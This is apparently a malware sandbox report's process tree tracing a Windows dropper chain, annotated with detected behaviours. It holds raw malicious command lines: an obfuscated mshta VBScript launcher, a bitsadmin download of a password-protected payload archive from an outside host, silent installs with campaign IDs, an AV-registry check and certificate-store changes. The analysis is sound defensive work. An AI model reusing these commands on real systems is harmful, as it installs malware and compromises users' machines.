C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "i8hX2rb2gYWCXaUEOy3W51c_.exe"12⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe"C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe"C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe" -u10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\hkAZQUdE7y720uA2jdtj5skU.exe"C:\Users\Admin\Pictures\Adobe Films\hkAZQUdE7y720uA2jdtj5skU.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"11⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1cc,0x210,0x7ff87886dec0,0x7ff87886ded0,0x7ff87886dee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff70b9e9e70,0x7ff70b9e9e80,0x7ff70b9e9e9013⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:212⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=1724 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=2348 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2520 /prefetch:112⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2512 /prefetch:112⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1596 /prefetch:212⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=3296 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=3716 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=3772 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=2136 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=844 /prefetch:812⤵
-
C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe"C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D482O.tmp\WBqf1wfQKQCPMmZBP5wnAft8.tmp"C:\Users\Admin\AppData\Local\Temp\is-D482O.tmp\WBqf1wfQKQCPMmZBP5wnAft8.tmp" /SL5="$40324,506127,422400,C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-E2CJD.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-E2CJD.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender\YUILRNYATQ\foldershare.exe"C:\Program Files\Windows Defender\YUILRNYATQ\foldershare.exe" /VERYSILENT12⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\d2-dda65-ae9-14085-58da38533875d\Vujazhaxami.exe"C:\Users\Admin\AppData\Local\Temp\d2-dda65-ae9-14085-58da38533875d\Vujazhaxami.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s2xouf2j.ojo\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\s2xouf2j.ojo\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\s2xouf2j.ojo\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\utkhvpur.jva\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
-
C:\Users\Admin\AppData\Local\Temp\utkhvpur.jva\installer.exeC:\Users\Admin\AppData\Local\Temp\utkhvpur.jva\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ejou4nwg.npq\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ejou4nwg.npq\any.exeC:\Users\Admin\AppData\Local\Temp\ejou4nwg.npq\any.exe14⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\ejou4nwg.npq\any.exe"C:\Users\Admin\AppData\Local\Temp\ejou4nwg.npq\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pwbkrj1u.uz4\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\pwbkrj1u.uz4\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\pwbkrj1u.uz4\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8384 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y123vafs.uuo\autosubplayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\y123vafs.uuo\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\y123vafs.uuo\autosubplayer.exe /S14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3nRxP8JaB9h67iL -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pT0fwB2WYFZFvlVy -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 176415⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y51zqrhq.jzc\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\y51zqrhq.jzc\setting.exeC:\Users\Admin\AppData\Local\Temp\y51zqrhq.jzc\setting.exe SID=778 CID=778 SILENT=1 /quiet14⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\y51zqrhq.jzc\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\y51zqrhq.jzc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635569260 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mgqzr0is.4l3\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\mgqzr0is.4l3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\mgqzr0is.4l3\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6456 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gysyo1o0.j24\vpn.exe /silent /subid=798 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\gysyo1o0.j24\vpn.exeC:\Users\Admin\AppData\Local\Temp\gysyo1o0.j24\vpn.exe /silent /subid=79814⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3GS6G.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-3GS6G.tmp\vpn.tmp" /SL5="$90216,15170975,270336,C:\Users\Admin\AppData\Local\Temp\gysyo1o0.j24\vpn.exe" /silent /subid=79815⤵
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "16⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090117⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "16⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090117⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall16⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install16⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b0tqwjmi.uqe\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\b0tqwjmi.uqe\installer.exeC:\Users\Admin\AppData\Local\Temp\b0tqwjmi.uqe\installer.exe /qn CAMPAIGN="654"14⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\b0tqwjmi.uqe\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\b0tqwjmi.uqe\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635569260 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksojpbmh.szr\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ksojpbmh.szr\any.exeC:\Users\Admin\AppData\Local\Temp\ksojpbmh.szr\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\ksojpbmh.szr\any.exe"C:\Users\Admin\AppData\Local\Temp\ksojpbmh.szr\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rkswhowl.v4u\customer51.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\rkswhowl.v4u\customer51.exeC:\Users\Admin\AppData\Local\Temp\rkswhowl.v4u\customer51.exe14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\suzbx0ad.qvm\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\suzbx0ad.qvm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\suzbx0ad.qvm\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9096 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\52slppkb.juj\autosubplayer.exe /S & exit13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nb0yvhob.rqw\installer.exe /qn CAMPAIGN=654 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\nb0yvhob.rqw\installer.exeC:\Users\Admin\AppData\Local\Temp\nb0yvhob.rqw\installer.exe /qn CAMPAIGN=65414⤵
-
C:\Users\Admin\AppData\Local\Temp\82-7f6b6-7e4-60f91-0adff13e05a68\Hatenitoli.exe"C:\Users\Admin\AppData\Local\Temp\82-7f6b6-7e4-60f91-0adff13e05a68\Hatenitoli.exe"12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:214⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:314⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:114⤵
-
